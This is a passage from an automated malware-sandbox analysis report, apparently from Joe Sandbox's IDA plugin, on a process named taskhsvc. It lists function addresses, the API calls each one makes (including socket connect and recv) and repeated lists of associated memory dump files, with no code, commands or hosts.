      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D893
      • Part of subcall function 0032D7F2: memcpy.MSVCRT ref: 0032D8AD
      • Part of subcall function 0032D7F2: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F57C7), ref: 0032D8C0
    • free.MSVCRT ref: 001F335D
      • Part of subcall function 00319BE8: memset.MSVCRT ref: 00319C1F
      • Part of subcall function 00319BE8: __stack_chk_fail.LIBSSP-0 ref: 00319C3A
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 003215E4
      • Part of subcall function 0032158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 00321623
      • Part of subcall function 0032158B: memcpy.MSVCRT ref: 0032164A
      • Part of subcall function 0032158B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313E8F), ref: 0032165D
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 00222CFD: __stack_chk_fail.LIBSSP-0 ref: 00222D23
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001ECEB8, Relevance: 6.2, APIs: 4, Instructions: 157
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 001ECB60: __stack_chk_fail.LIBSSP-0 ref: 001ECEAA
      • Part of subcall function 001E8718: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001EF09F), ref: 001E873F
      • Part of subcall function 0032D3C2: abort.MSVCRT ref: 0032D412
      • Part of subcall function 0032D3C2: __stack_chk_fail.LIBSSP-0 ref: 0032D507
    • memset.MSVCRT ref: 001ECFFA
      • Part of subcall function 0032E04A: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0032E0EC), ref: 0032E0B0
      • Part of subcall function 0032D28C: abort.MSVCRT ref: 0032D2DC
      • Part of subcall function 0032D28C: __stack_chk_fail.LIBSSP-0 ref: 0032D3BB
    • memset.MSVCRT ref: 001ED09B
      • Part of subcall function 0032B7BA: memset.MSVCRT ref: 0032B7F8
      • Part of subcall function 0032B7BA: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001EEAEA), ref: 0032B8FC
    • abort.MSVCRT ref: 001ED11A
    • __stack_chk_fail.LIBSSP-0 ref: 001ED1BD
      • Part of subcall function 0021FF60: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001C3667), ref: 0021FFA2
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 001EC647: abort.MSVCRT ref: 001EC6C4
      • Part of subcall function 001EC647: abort.MSVCRT ref: 001EC703
      • Part of subcall function 001EC647: abort.MSVCRT ref: 001EC742
      • Part of subcall function 001EC647: abort.MSVCRT ref: 001EC9EF
      • Part of subcall function 001EC647: connect.WS2_32 ref: 001ECA38
      • Part of subcall function 001EC647: __stack_chk_fail.LIBSSP-0 ref: 001ECB59
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001E4527, Relevance: 6.1, APIs: 4, Instructions: 136
    APIs
    • abort.MSVCRT ref: 001E459D
    • abort.MSVCRT ref: 001E45E0
    • abort.MSVCRT ref: 001E46E5
      • Part of subcall function 001E331A: __stack_chk_fail.LIBSSP-0 ref: 001E335F
      • Part of subcall function 001E4071: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E4145
      • Part of subcall function 001E4071: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E419E
      • Part of subcall function 001E4071: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E41C6
      • Part of subcall function 001E4243: recv.WS2_32 ref: 001E42C1
      • Part of subcall function 001E4243: abort.MSVCRT ref: 001E4431
      • Part of subcall function 001E4243: __stack_chk_fail.LIBSSP-0 ref: 001E4444
    • __stack_chk_fail.LIBSSP-0 ref: 001E4715
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002CF6A9, Relevance: 6.1, APIs: 4, Instructions: 102
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231B56
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231B99
      • Part of subcall function 00231AED: abort.MSVCRT ref: 00231BE6
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231BF4
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C08
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C26
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C44
      • Part of subcall function 00231AED: __stack_chk_fail.LIBSSP-0 ref: 00231D14
      • Part of subcall function 003259C5: abort.MSVCRT ref: 00325A21
      • Part of subcall function 003259C5: _stati64.MSVCRT ref: 00325A8E
      • Part of subcall function 003259C5: free.MSVCRT ref: 00325AA7
      • Part of subcall function 003259C5: strerror.MSVCRT ref: 00325AD7
      • Part of subcall function 003259C5: _mkdir.MSVCRT ref: 00325B54
      • Part of subcall function 003259C5: strerror.MSVCRT ref: 00325B72
      • Part of subcall function 003259C5: __stack_chk_fail.LIBSSP-0 ref: 00325C45
    • free.MSVCRT ref: 002CF754
      • Part of subcall function 0032587B: _stati64.MSVCRT ref: 00325913
      • Part of subcall function 0032587B: free.MSVCRT ref: 0032592C
      • Part of subcall function 0032587B: __stack_chk_fail.LIBSSP-0 ref: 003259BE
    • strerror.MSVCRT ref: 002CF7A9
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 002CF869
      • Part of subcall function 002D04A8: abort.MSVCRT ref: 002D0507
      • Part of subcall function 002D04A8: free.MSVCRT ref: 002D06A5
      • Part of subcall function 002D04A8: __stack_chk_fail.LIBSSP-0 ref: 002D06DA
    • free.MSVCRT ref: 002CF84F
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00321664, Relevance: 6.1, APIs: 4, Instructions: 59
    APIs
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,002E0704), ref: 003216BD
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,002E0704), ref: 00321744
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,002E0704), ref: 003216FC
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • memcpy.MSVCRT ref: 00321726
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003214A4, Relevance: 6.1, APIs: 4, Instructions: 59
    APIs
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 003214FA
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 00321584
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 0032153C
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • strncpy.MSVCRT ref: 00321566
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
